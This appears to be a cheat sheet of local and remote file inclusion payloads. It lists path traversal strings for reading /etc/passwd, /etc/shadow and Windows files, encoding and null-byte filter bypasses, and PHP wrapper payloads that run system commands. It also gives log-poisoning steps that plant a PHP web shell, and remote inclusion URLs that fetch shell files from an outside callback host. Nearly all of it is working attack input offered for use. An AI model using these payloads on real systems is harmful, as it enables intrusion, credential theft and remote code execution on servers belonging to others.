📁 LFI/RFI Payloads

Path Traversal

Read local files on Linux systems using path traversal

Linux ../../../etc/passwd ../../../../etc/passwd ../../../../../etc/shadow /etc/passwd /etc/hosts /proc/self/environ

Windows Files

Read local files on Windows systems

Windows ..\..\..\..\windows\win.ini C:\windows\win.ini C:\windows\system32\drivers\etc\hosts ..\..\..\..\..\boot.ini

Null Byte Injection

Bypass file extension checks (PHP < 5.3)

../../../etc/passwd%00 ../../../../etc/passwd%00.jpg /etc/passwd%00

Encoding Bypass

Use URL encoding to bypass input filters

..%2F..%2F..%2Fetc%2Fpasswd ..%252F..%252F..%252Fetc%252Fpasswd ..%c0%af..%c0%af..%c0%afetc%c0%afpasswd

Path Truncation

Bypass extension checks via path truncation

../../../etc/passwd............[ADD MORE DOTS] ../../../etc/passwd/./././././[ADD MORE]

php://filter

Use PHP filters to read and encode files

PHP php://filter/convert.base64-encode/resource=index.php php://filter/read=string.rot13/resource=index.php php://filter/convert.iconv.utf-8.utf-16/resource=index.php

php://input

Execute code via php://input wrapper

PHP php://input

POST data: <?php system('whoami'); ?>

data://

Execute code via data:// wrapper

PHP data://text/plain, data://text/plain;base64,PD9waHAgc3lzdGVtKCd3aG9hbWknKTsgPz4=

Apache Logs

Poison Apache log files to execute code

Apache ../../../../../../var/log/apache2/access.log ../../../../../../var/log/apache2/error.log

Inject PHP in User-Agent: <?php system($_GET['c']); ?>

SSH Logs

Poison SSH authentication logs

../../../../../../var/log/auth.log

SSH with username: <?php system($_GET['c']); ?>

Session Files

Include PHP session files for code execution

PHP /var/lib/php/sessions/sess_[SESSIONID] ../../../../../../tmp/sess_[SESSIONID]

RFI Basic

Include remote malicious files for code execution

http://callback.l4ughingm4n.dev/shell.txt https://callback.l4ughingm4n.dev/shell.php //callback.l4ughingm4n.dev/shell.txt